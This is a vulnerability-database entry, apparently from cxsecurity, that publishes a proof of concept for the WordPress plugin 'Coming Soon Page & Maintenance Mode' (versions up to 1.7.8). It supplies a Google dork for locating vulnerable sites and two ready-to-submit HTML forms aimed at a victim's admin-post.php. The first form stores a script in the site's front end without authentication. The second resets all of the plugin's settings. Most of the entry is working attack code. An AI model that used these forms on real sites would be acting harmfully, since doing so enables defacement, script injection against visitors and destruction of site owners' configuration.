Coming Soon Page & Maintenance Mode v1.8.0 Unauthenticated Persistent XSS Injection

2019.07.23
ru m0ze (RU) ru
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: inurl:"wp-content/plugins/responsive-coming-soon"

/*! * # Exploit Title: Coming Soon Page & Maintenance Mode v1.7.8 Unauthenticated Persistent XSS Injection * # Google Dork: inurl:"wp-content/plugins/responsive-coming-soon" * # Date: 2019/07/20 * # Original researcher: Ryan Dewhurst [twitter.com/ethicalhack3r] * # PoC Author: m0ze * # Vendor Homepage: https://wpshopmart.com/ * # Software Link: https://wordpress.org/plugins/responsive-coming-soon/ * # Version: <= 1.7.8 * # Tested on: WordPress v5.2.2 + Coming Soon Page & Maintenance Mode v1.7.8 * # CVE: - * # CWE: CWE-79 */ ::- Details & Description -:: ~ The «Coming Soon Page & Maintenance Mode» plugin, which has more than 7.000 active installations, was vulnerable to persistent XSS Injection and settings reset possibility that allowed an unauthenticated attacker to inject JavaScript or HTML code into the blog front-end or simply erase all existed settings. ::- Special Note -:: ~ Please pay attention that I'm not the original researcher, I'm making the PoC public. ::- PoC [Unauthenticated Persistent XSS Injection] -:: ~ Simple POST request, no auth is needed. <!DOCTYPE html> <html> <head><meta charset="utf-8"></head> <body> <form action="http://victimdomain.com/wp-admin/admin-post.php?page=wpsm_responsive_coming_soon" method="POST"> <input type="hidden" name="action_rcs" value="action_rcs_page_setting_save_post" /> <input type="hidden" name="hook" value="general" /> <input type="hidden" name="rcsp_logo_url" value="http://victimdomain.com/wp-content/plugins/responsive-coming-soon/img/wp.png" /> <input type="hidden" name="logo_width" value="13" /> <input type="hidden" name="logo_height" value="13" /> <input type="hidden" name="logo_enable" value="on" /> <input type="hidden" name="rcsp_headline" value="m0ze was here" /> <input type="hidden" name="rcsp_description" value="<script>alert('m0ze');</script>" /> <input type="hidden" name="home_sec_link_txt" value="m0ze" /> <input type="submit" value="Submit Data" /> </form> </body> </html> ::- PoC [Unauthenticated Settings Reset] -:: ~ Another simple POST request, no auth is needed. <!DOCTYPE html> <html> <head><meta charset="utf-8"></head> <body> <form action="http://victimdomain.com/wp-admin/admin-post.php?page=wpsm_responsive_coming_soon" method="POST"> <input type="hidden" name="action_rcs_reset" value="action_rcs_page_setting_reset_post" /> <input type="hidden" name="hook" value="general" /> <input type="submit" value="Submit Data" /> </form> </body> </html>

Referencje:

https://wpvulndb.com/vulnerabilities/9459
https://wordpress.org/plugins/responsive-coming-soon/


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top